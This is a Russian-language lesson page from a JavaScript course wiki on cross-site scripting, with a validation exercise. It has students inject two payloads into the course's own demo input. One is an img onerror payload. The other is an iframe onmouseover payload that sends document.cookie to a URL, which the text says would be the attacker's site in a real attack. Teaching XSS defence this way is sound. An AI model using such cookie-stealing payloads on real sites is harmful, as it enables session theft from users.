Skip to content
garevna edited this page Sep 12, 2018 · 5 revisions

🎓 XSS

XSS ( Cross-Site Scripting — «межсайтовый скриптинг» ) — атака на веб-систему путем инъекции вредоносного кода

( вместо "C" используется "X", чтобы не было путаницы с CSS )
Внедренный код будет выполняться на компьютере пользователя
Код может пересылать конфиденциальные данные  пользователя  веб-серверу хакера
Разновидностей XSS-атак очень много
Частично они отражаются на уровне браузера
В данном примере мы  будем внедрять код при вводе пользовательских данных
и использовать обработчиков событий элементов для запуска внедренного кода

[:link: Перейдите по ссылке](https://garevna.github.io/js-samples/#03 target="_blank")

Откройте Chrome DevTools

Установите точки останова ( breakpoints ) для того, чтобы пошагово отслеживать выполнение кода и вносить изменения в код

  1. Скопируйте код ниже и вставьте его в поле ввода элемента input:
<IMG SRC="images/hack.png" onerror="document.write ( String.fromCharCode ( 88, 83, 83) )"/>

это довольно безобидная "атака", которая просто перезапишет содержимое body

  1. Скопируйте код ниже и вставьте его в поле ввода элемента input:
<IFRAME SRC=js/attack.html 
        onmouseover="window.open ( 'https://garevna.github.io/js-samples/js/attack.html#' + document.cookie, '_self' )">
</IFRAME>

( с помощью такой строки можно украсть куки с компьютера пользователя, где хранится конфиденциальная информация о нем )

Обратите внимание, что вместо ссылки ☕ https://garevna.github.io/js-samples/js/attack.html

в реальной атаке будет ссылка на сайт ( страницу ) хакера

💼

В панели навигации откройте файл js/index03.js

Обратите внимание на функцию валидации ввода пользователя ( testUserText )

В случае XSS атаки функция должна заменить текст, введенный пользователем, на сообщение: "XSS атака отражена" с указанием текущей даты и времени


🔗 securitylab 🔗 websitesecurity

© Irina H.Fylyppova 2018
Использование данных материалов или любой их части коммерческими школами ( курсами ) является нарушением авторских прав


Новая версия


1 2 3 4 5
6 7 8 9 10
11 12 13 14 15
16 17 18 19

Занятие 1

⤵️

Занятие 2

⤴️ ⤵️

Занятие 3

⤴️ ⤵️

Занятие 4

⤴️ ⤵️

Занятие 5

⤴️ ⤵️

Занятие 6

⤴️ ⤵️

Занятие 7

⤴️ ⤵️

Занятие 8

⤴️ ⤵️

Занятие 9

⤴️ ⤵️

Занятие 10

⤴️ ⤵️

Занятие 11

⤴️ ⤵️

Занятие 12

⤴️ ⤵️

Занятие 13

⤴️ ⤵️

Занятие 14

⤴️ ⤵️

Занятие 15

⤴️ ⤵️

Занятие 16

⤴️ ⤵️

Занятие 17

⤴️ ⤵️

Занятие 18

⤴️ ⤵️

Занятие 19

⤴️ ⤵️

⤴️

ico20 Дополнительно
dir-20 Справочная инфо

Clone this wiki locally